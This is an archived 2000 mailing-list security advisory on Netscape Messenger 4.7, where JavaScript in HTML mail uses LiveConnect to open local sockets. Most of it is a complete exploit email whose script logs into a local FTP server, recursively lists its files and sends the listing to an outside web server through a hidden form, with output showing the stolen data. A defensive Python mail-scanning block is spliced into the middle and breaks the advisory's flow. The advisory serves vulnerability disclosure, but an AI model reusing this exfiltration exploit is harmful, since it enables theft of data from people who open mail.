List:       mozilla-security
Subject:    Bug in Netscape Messenger
From:       "ESTC" <tesc0176 () mail ! telepac ! pt>
Date:       2000-03-27 15:31:36

Netscape Messenger sends out sensitive information (LiveConnect)
Mar, 25 2000 - 08:10
The LiveConnect technology lets JavaScript and Java code communicate with
each other. Thus, JavaScript programs embedded inside an email message can
access java methods in the localhost "sandbox". This can be used for many
things, one of which (as shown in the attached exploit) lists the content of
a directory on a local FTP server - this is an action a script that came
from the Internet shouldn't be allowed to do.

Vulnerable - Netscape Communicator 4.7

The following example shows how a JavaScript program embedded inside an HTML
email (opened in Netscape Messenger) can connect to any local port and
send/receive data. The JavaScript code connects to a local FTP server, gathers
a directory listing and sends it to an HTTP server in a GET request. The CGI
script test-cgi merely shows that the information can be transmitted to any
web server on the Internet.

Moreover, malicious code (for example, a buffer overflow attack) could be sent
to any vulnerable local port on the host where the user reads mail, bypassing
firewalls, etc.
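The defensive counterpart to the technique described above is to catch such messages at the mail gateway before a LiveConnect-capable client renders them. The following is an added example, not part of the original advisory: it parses an HTML mail, extracts every script element and flags references to the Java packages reachable through LiveConnect (java.net, java.io, java.lang.Runtime), noting when the script also targets the local host. The sample message is constructed for this example and is not the advisory's exploit.

```python
import re
from email import message_from_string
from email.policy import default

# Constructed sample: a minimal HTML mail whose script uses LiveConnect to reach a local socket.
SAMPLE_MAIL = """Subject: hello
Content-Type: text/html; charset=us-ascii

<html><body>hello man !
<script language="javascript">
  addr=java.net.InetAddress.getLocalHost();
  socket=java.net.Socket("localhost",21);
</script>
</body></html>
"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Java packages that, via LiveConnect, hand a script raw network, file or process access.
LIVECONNECT_RE = re.compile(r"\b(?:java|Packages)\.(?:net|io|lang\.Runtime)\b")
# Signs that the script aims at the reader's own machine rather than a remote host.
LOCAL_TARGET_RE = re.compile(r'(?:"localhost"|"127\.\d+\.\d+\.\d+"|InetAddress\.getLocalHost)')


def find_liveconnect_scripts(raw_mail: str) -> list:
    """Return one finding per <script> block in any text/html part that touches LiveConnect."""
    msg = message_from_string(raw_mail, policy=default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        body = part.get_content()
        for match in SCRIPT_RE.finditer(body):
            script = match.group(1)
            packages = sorted(set(LIVECONNECT_RE.findall(script)))
            if not packages:
                continue  # plain DHTML; nothing the sandbox would not already restrict
            findings.append({
                "packages": packages,
                "targets_local_host": bool(LOCAL_TARGET_RE.search(script)),
            })
    return findings


def should_quarantine(raw_mail: str) -> bool:
    """Gateway policy for this example: any LiveConnect use in mail-borne script is quarantined."""
    return bool(find_liveconnect_scripts(raw_mail))
```

Sample mail and policy are assumptions made for the example; a real gateway would also scan nested multipart/alternative and quoted-printable or base64 encoded HTML parts, which the email module decodes for you through get_content().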

Exploit Code:

(NOTE: Remove the leading <!-- on the header lines; it was added to keep
mail clients from processing them.)
#------------------MAIL BEGIN-----------------------
<!--Subject: hello
<!--Content-Type: text/html; charset=us-ascii
<!--Content-Transfer-Encoding: 7bit

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<BODY>
hello man !

<FORM NAME="form" ACTION="http://172.21.1.12/cgi-bin/test-cgi"
METHOD="GET">
<INPUT TYPE="hidden" NAME="addr">
<INPUT TYPE="hidden" NAME="host">
<INPUT TYPE="hidden" NAME="list">
</FORM>

<PRE>
<SCRIPT Language="javascript" >
var dbg=1
function debug(s) { if (dbg==1) document.writeln(s); }

   addr=java.net.InetAddress.getLocalHost();
   host=addr.getHostName();
   document.form.host.value=host;
   document.form.addr.value=addr;
   debug("host:"+host);
   debug("addr:"+addr);

   socket=java.net.Socket("localhost",21);
   sin=socket.getInputStream();
   din=java.io.DataInputStream(sin);
   sout=socket.getOutputStream();
   pout=java.io.PrintStream(sout);

   s=din.readLine(); debug("rcv:"+s);

   cmd="USER anonymous\n"
   debug("snd:"+cmd+"<BR>");
   pout.print(cmd);
   s=din.readLine(); debug("rcv:"+s);

   cmd="PASS toto@titi\n"
   debug("snd:"+cmd);
   pout.print(cmd);
   s=din.readLine(); debug("rcv:"+s);

   cmd="PASV\n"
   debug("snd:"+cmd);
   pout.print(cmd);
   s=din.readLine(); debug("rcv:"+s);

   q=s.substring(s.indexOf("(")+11,s.indexOf(")"));
   c=q.indexOf(",");
   port=parseInt(q.substring(0,c))*256+parseInt(q.substring(c+1));
   debug("port="+port);

   socket2=java.net.Socket("localhost",port);
   sin2=socket2.getInputStream();
   din2=java.io.DataInputStream(sin2);

   cmd="LIST -R\n"
   debug("snd:"+cmd);
   pout.print(cmd);
   s=din.readLine();
   debug("rcv:"+s);

   list=""
   while (s!=null) {
     s=din2.readLine();
     debug(s);
     list=list+s;
   }

   document.form.list.value=list;
   document.form.submit()
</SCRIPT>
</BODY>
</html>
#------------------MAIL END-----------------------

This is what you see in Netscape Messenger when you open the mail above:

#------------------MESSENGER BEGIN ---------------
<!--Subject:  hello
<!--Date: Wed, 15 Mar 2000 11:36:41 +0100
<!--From: vroyer@althes.fr

hello man !

host:alpha
addr:alpha/172.21.1.32
rcv:220 alpha.beta.fr FTP server (Version 6.2/OpenBSD/Linux-0.11) ready.
snd:USER anonymous

rcv:331 Guest login ok, send your complete e-mail address as password.
snd:PASS toto@titi

rcv:230 Guest login ok, access restrictions apply.
snd:PASV

rcv:227 Entering Passive Mode (127,0,0,1,4,7)
port=1031
snd:LIST -R

rcv:150 Opening ASCII mode data connection for '/bin/ls'.
total 28
drwxr-xr-x   2 0        0            4096 Jan 20 15:32 bin
drwxr-xr-x   2 0        0            4096 Jan 20 15:32 dev
drwxr-xr-x   2 0        0            4096 Jan 20 15:32 etc
drwxr-xr-x   2 0        0            4096 Nov 13 04:00 lib
drwxr-xr-x   2 0        0            4096 Jan 20 15:32 msgs
drwxr-xr-x   2 0        0            4096 Nov 13 04:00 pub
drwxr-xr-x   3 0        0            4096 Jan 20 15:32 usr

bin:
total 1024
-rwxr-xr-x   1 0        0          235304 Nov 13 04:00 compress
-rwxr-xr-x   1 0        0          367936 Nov 13 04:00 ls
-rwxr-xr-x   1 0        0          429572 Nov 13 04:00 tar

dev:
total 0
crw-rw-rw-   1 0        0          1,   3 Nov 13 04:00 null

etc:
total 8
-rw-r--r--   1 0        0              31 Apr 21  1996 group
-rw-r--r--   1 0        0              38 Apr 21  1996 passwd

lib:
total 0

msgs:
total 8
-rw-r--r--   1 0        0              61 May  7  1996 msg.dead
-rw-r--r--   1 0        0             417 May  7  1996 welcome.msg

pub:
total 0

usr:
total 4
drwxr-xr-x   2 0        0            4096 Jan 20 15:32 bin

usr/bin:
total 728
-rwxr-xr-x   1 0        0          367252 Nov 13 04:00 gzip
-rwxr-xr-x   1 0        0          367936 Nov 13 04:00 ls
null


#------------------MESSENGER END ---------------


This shows that the directory listing has been sent to a remote HTTP server:

#------------------NAVIGATOR BEGIN ---------------
CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = Apache/1.3.6 (Unix) (SuSE/Linux) PHP/3.0.7
mod_perl/1.19 mod_ssl/2.2.8 SSLeay/0.9.0b
SERVER_NAME = tutu.titi.fr
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING =
addr=alpha%2F172.21.1.32&host=alpha&list=total+28drwxr-xr-x+++2+0++++++++0++
++++++++++4096+Jan+20+15%3A32+bindrwxr-xr-x+++2+0++++++++0++++++++++++4096+J
an+20+15%3A32+devdrwxr-xr-x+++2+0++++++++0++++++++++++4096+Jan+20+15%3A32+et
cdrwxr-xr-x+++2+0++++++++0++++++++++++4096+Nov+13+04%3A00+libdrwxr-xr-x+++2+
0++++++++0++++++++++++4096+Jan+20+15%3A32+msgsdrwxr-xr-x+++2+0++++++++0+++++
+++++++4096+Nov+13+04%3A00+pubdrwxr-xr-x+++3+0++++++++0++++++++++++4096+Jan+
20+15%3A32+usrbin%3Atotal+1024-rwxr-xr-x+++1+0++++++++0++++++++++235304+Nov+
13+04%3A00+compress-rwxr-xr-x+++1+0++++++++0++++++++++367936+Nov+13+04%3A00+
ls-rwxr-xr-x+++1+0++++++++0++++++++++429572+Nov+13+04%3A00+tardev%3Atotal+0c
rw-rw-rw-+++1+0++++++++0++++++++++1%2C+++3+Nov+13+04%3A00+nulletc%3Atotal+8-
rw-r--r--+++1+0++++++++0++++++++++++++31+Apr+21++1996+group-rw-r--r--+++1+0+
+++++++0++++++++++++++38+Apr+21++1996+passwdlib%3Atotal+0msgs%3Atotal+8-rw-r
--r--+++1+0++++++++0++++++++++++++61+May++7++1996+msg.dead-rw-r--r--+++1+0
+++++!
+++0+++++++++++++417+May++7++1996+welcome.msgpub%3Atotal+0usr%3Atotal+4drwxr
-xr-x+++2+0++++++++0++++++++++++4096+Jan+20+15%3A32+binusr%2Fbin%3Atotal+728
-rwxr-xr-x+++1+0++++++++0++++++++++367252+Nov+13+04%3A00+gzip-rwxr-xr-x+++1+
0++++++++0++++++++++367936+Nov+13+04%3A00+lsnull
REMOTE_HOST =
REMOTE_ADDR = 172.21.1.32
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
#------------------NAVIGATOR END ---------------
provided by - vroyer - vroyer@althes.fr